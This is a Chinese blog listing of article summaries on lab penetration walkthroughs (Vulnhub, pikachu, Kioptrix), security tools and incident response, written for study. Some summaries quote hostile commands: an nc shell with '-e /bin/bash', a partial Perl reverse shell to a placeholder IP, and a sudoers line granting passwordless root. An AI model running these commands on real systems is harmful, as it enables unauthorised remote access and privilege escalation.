- 博客(52)
- 收藏
- 关注
RSS订阅原创 Vulnhub-PwnOS v1.0靶机
首先通过信息收集发现该靶机10000端口的webmin存在文件读取漏洞,然后通过读取shadow文件信息,破解哈希或者ssh账号密码,最后再通过cgi提权。
2025-04-02 16:30:11
249
原创 Vulnhub-IMF靶机
首先通过信息收集(如端口扫描、目录枚举的源码审计)发现潜在信息泄露,接着利用SQL注入获取关键上传php信息,然后通过文件上传、命令注如(python3反弹shell),连接靶机,最后通过CVE-2021-4034漏洞获取root权限完成渗透。
2025-04-02 16:17:26
223
原创 应急响应-windows信息采集工具
在应急响应中,手动收集信息就像用算盘处理海量数据,而专业采集工具则如同超级计算机——两者的差距,直接决定了你是"手忙脚乱"还是"游刃有余"。所以有效的工具可以让我们采集信息的速度从“龟速”到“光速”
2025-04-01 16:43:47
430
原创 Vulnhub-zico2靶机打靶记录
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列zico2靶机有一定的了解。
2025-04-01 14:44:14
230
原创 手工排查后门木马的常用姿势
● 重点关注:.php、.jsp、.asp、.sh 等可执行文件。● 隐藏文件:检查 /tmp/、/dev/shm/ 等临时目录。● 常见WebShell:shell.php、b374k.php、c99.php、wso.php。● 隐藏技巧:攻击者可能使用 …gif.php 伪装成图片。● 异常大文件:可能是攻击者存放的加密数据或恶意代码。● 常见后门进程:● nc -lvp 4444 -e /bin/bash(反弹Shell)● perl -e 'use Socket;i="x.x.x.x
2025-03-31 17:45:05
652
原创 Vulnhub-node靶机教学
本次靶机主要通过网页主页源码查看到api文件导致账号密码信息泄露,从而获取服务器普通用户权限,再根据机器上的系统内核版本的信息搜集,使用漏洞检索工具searchsploit,利用exp进行提权。
2025-02-21 17:21:34
540
原创 漏洞扫描工具:AWVS
AWVS(Acunetix Web Vulnerability Scanner)是一款专业的Web漏洞扫描工具,用于检测网站的安全漏洞。它通过网络爬虫测试网站安全,检测流行安全漏洞,适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。
2025-02-14 11:43:06
346
原创 pikachu靶机-越权、目录遍历、敏感信息泄露
Over Permission(越权)是指在应用程序中,由于权限校验机制不完善,导致用户能够访问或操作其权限范围之外的资源。越权漏洞通常出现在需要登录的页面,尤其是涉及增、删、改、查等操作的场景目录遍历(Directory Traversal)是一种常见的Web安全漏洞,攻击者通过利用特殊字符(如…/)绕过服务器的安全限制,访问服务器上的任意文件,甚至执行系统命令。
2025-02-13 13:47:46
547
原创 Burp suite 之 IP伪造
Burp Suite的FakeIP插件主要用于在安全测试中伪造IP地址,以绕过服务器的IP限制或WAF(Web应用防火墙)的封锁。IP伪造这么便捷为什么不适用IP伪装而去使用IP代理池呢因为IP伪造的每个数据包只是为了骗过浏览器、waf的请求,但是网络建立的连接确实实实在在的。
2025-02-12 14:06:34
318
原创 crossfire1.9.0版本缓冲区溢出攻击到提权:linux32位
来自本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他用途!!!# 所有16进制字符。
2025-02-11 17:46:09
1953
原创 渗透Vulnhub-election靶机日志信息泄露
本靶机主要是网页上的日志信息泄露,从而获取服务器普通用户权限,再根据机器上的应用程序版本的信息搜集,使用漏洞检索工具searchsploit,利用exp进行提权。(文中遇到的mysql跟/home/love/desktop/user.txt、 gnome-initial-setup-done 信息或程序大概率都是属于兔子洞骗你在这里花时间)
2025-02-10 09:36:32
568
原创 渗透测试中反弹shell常用的几种姿势
反弹Shell(Reverse Shell),是一种网络安全概念,指的是攻击者通过特定的技术手段,使得受害者能够主动与攻击者建立连接,从而实现远程控制的目标系统。这种技术通常用于渗透测试和安全研究,但在非法环境中,它可能被用来窃取敏感信息或执行恶意代码。
2025-02-08 09:14:30
576
原创 pikachu靶场非安全文件下载/上传
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全的文件下载漏洞。此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如…/…/…/etc/passwd),则很有可能会直接将该指定的文件下载下来。
2025-02-07 14:57:46
681
原创 缓冲区溢出漏洞攻击及获取权限
来自本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他用途!!!
2025-01-27 11:41:36
1391
原创 靶机复现-pikachu靶机文件包含漏洞
文件包含漏洞是编程中的一种安全隐患,常见于PHP等语言。它源于程序运行时依据用户输入或外部数据动态包含文件的机制,当对输入路径缺乏足够验证和过滤时,攻击者可构造恶意路径。这一漏洞危害巨大,既能实现代码执行,让攻击者在目标服务器植入恶意程序、控制服务器,又能导致敏感信息泄露,像数据库和用户认证信息等外流。防范方面,要对包含文件的输入严格验证过滤,采用白名单等方式确保文件来源合法;在服务器端(如PHP里)关闭远程文件包含功能;同时遵循最小权限原则,限制运行Web应用的用户的权限,从而降低被攻击后的损害程度。
2025-01-21 15:25:14
596
原创 pikachu靶机-sql注入
本篇文章旨在为网络安全渗透测试靶机复现学习(内容学习中,仅供参考)。通过阅读本文,读者将能够对渗透pikachu靶场SQL注入模块有一定的了解。
2025-01-20 21:01:35
894
原创 pikachu靶机-CSRF
本篇文章旨在为网络安全渗透测试靶机复现教学。通过阅读本文,读者将能够对渗透pikachu靶场CSRF跨站脚本攻击模块有一定的了解。
2025-01-17 14:15:49
622
原创 pikachu靶机-Cross-Site Scripting(XSS)
本篇文章旨在为网络安全渗透测试靶机复现教学。通过阅读本文,读者将能够对渗透pikachu靶场XSS跨站脚本攻击模块有一定的了解。
2025-01-16 14:58:33
874
原创 pikachu靶机学习-爆破模块
本篇文章旨在为网络安全渗透测试靶机复现教学。通过阅读本文,读者将能够对渗透pikachu靶场暴力破解模块有一定的了解。
2025-01-15 17:27:25
421
原创 渗透Vulnhub-SkyTower靶机
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列SkyTower靶机有一定的了解。
2025-01-14 14:36:31
1387
原创 渗透Vulnhub-hackme靶机
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列hackme靶机有一定的了解。
2025-01-13 22:20:45
606
原创 渗透测试武器库-悬剑5
相对于自己一个一个去下载安装所需的工具,并且为每一个工具配置各种依赖各种环境,悬剑武器库就适合我们这种可以偷懒的,它将我们平时常用的所需的各种工具都集成到了一个操作系统里,我们想要使用时只要在虚拟机运行此系统即可。悬剑5 基于“悬剑网盘”精选工具集+悬剑5“飞廉”云武器库制作。操作系统:Windows 10锁屏密码:secquan.org下载链接:https://pan.quark.cn/s/f79d9f472dfe提取码:Bypq。
2025-01-10 11:00:57
1295
2
原创 复现渗透Vulnhub-VulnOSv2靶机
本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列VulnOSv2靶机有一定的了解。
2025-01-07 10:46:26
679
原创 主动信息收集工具:Nmap
nmap工具是一款功能强大的网络扫描工具,主要用于网络发现、管理和安全审计。它可以进行主机发现、端口扫描、操作系统识别、服务版本检测等多种功能,帮助用户识别网络中的活跃主机、开放的端口、运行的服务以及潜在的安全漏洞。
2025-01-06 14:28:59
964
原创 社工字典生成工具:DictGenerate
DictGenerate是一个使用Go语言编写的社会工程学字典生成器,支持MacOS、Linux、Windows系统。它主要用于生成社会工程学字典。当我们进行了信息收集后掌握了一部分人员信息,即可用人员的关键信息大量密码进行密码爆破。
2025-01-04 14:31:41
796
原创 漏洞扫描工具:Xray
Xray是一款功能强大的漏洞扫描工具,支持主动和被动扫描方式,能够自动化检测Web应用程序中的各种漏洞,如SQL注入、XSS、命令注入等。它采用Go语言编写,跨平台支持Windows、macOS和Linux,具备快速、高效、可定制的特点,适用于安全测试和评估。
2025-01-03 13:53:25
822
原创 自动化XSS扫描器:Dalfox
Dalfox是一款功能强大的开源XSS扫描工具,其名称来源于韩语发音“Dal”(月亮)与英文“Fox”(狐狸)的结合,寓意着“XSS的探测者”。这款工具专注于自动化,非常适合用于快速扫描XSS漏洞以及分析参数。凭借其先进的测试引擎和特殊功能,Dalfox旨在简化漏洞检测和验证的过程。
2025-01-02 13:37:48
764
原创 渗透Vulnhub-tr0ll靶机
本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列tr0ll靶机有定的了解。
2024-12-31 11:07:29
617
原创 渗透Vulnhub-Solidstate靶机
本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列Solidstate靶机有定的了解。
2024-12-26 14:12:27
734
原创 OSCP课后练习-流量日志分析
本篇文章旨在为网络安全渗透测试行业OSCP考证教学。通过阅读本文,读者将能够对tcpdump日志分析关键信息过滤有一定了解。
2024-12-25 16:32:21
457
原创 渗透Vulnhub-DC-9靶机
echo "fredf ALL=(root) NOPASSWD:ALL" > /tmp/abc.txt #fredf 用户可以在任何主机以root身份运行任何命令。
2024-12-24 17:01:30
1147
原创 linux basics
使用alert或者notify-send等工具发送通知/bin/bashwhile true #死循环do #do中是循环体sleep 2 #中途停两秒done #done脚本结束标志。
2024-12-18 20:58:04
468
原创 渗透Kioptrix-Level 5靶机
本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Kioptrix-Level 5靶机有一个初步的了解。
2024-12-14 12:39:24
546
原创 渗透Kioptrix-Level 4靶机
因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24按照惯例对虚拟机DHCP网段进行nmap扫描(1)#kali安装dirsearch工具(2)dirb扫描目录以下两个目录存在文件泄露(1)burp suite 抓取输入账号密码的请求数据包(2)请求数据包复制到post.txt文件(3)使用sqlmap读取post.txt请求数据包注入测试(4)通过sql注入得到的账号密码(1)使用john账号ssh登录(2)使用rebert账号s
2024-12-13 09:11:42
984
原创 OSCP课后练习--应急响应--apache防御日志
本篇文章旨在为网络安全渗透测试行业OSCP考证教学。通过阅读本文,读者将能够对apache防御日志关键信息过滤有一定了解。
2024-12-12 09:45:33
841
原创 shodan(4)挂黑网站查询及后台查询(弱口令)
本篇文章旨在为网络安全初学者介绍渗透测试行业信息收集的引擎。通过阅读本文,读者将能够对shodan引擎工具的使用有一个初步的了解,帮助读者打开学习思路。
2024-12-11 14:01:15
573
原创 shodan(3)命令进阶及VNC空密码实战
VNC空密码连接是指在使用VNC(Virtual Network Computing,虚拟网络计算)技术进行远程桌面控制时,不设置任何密码或者设置为空密码的情况。在这种情况下,任何人都可以通过VNC客户端连接到相应的VNC服务器,而不需要输入密码进行身份验证。这无疑会带来严重的安全隐患,因为未经授权的用户也有可能通过这种方式访问到远程计算机,造成数据泄露或其他安全问题通过上述措施,我们可以有效地提高VNC服务器的安全性,降低被攻击的风险。
2024-12-11 11:53:08
965
原创 渗透Kioptrix-Level 3靶机
本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Kioptrix-Level 3靶机有一个初步的了解。
2024-12-10 09:39:25
1440
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人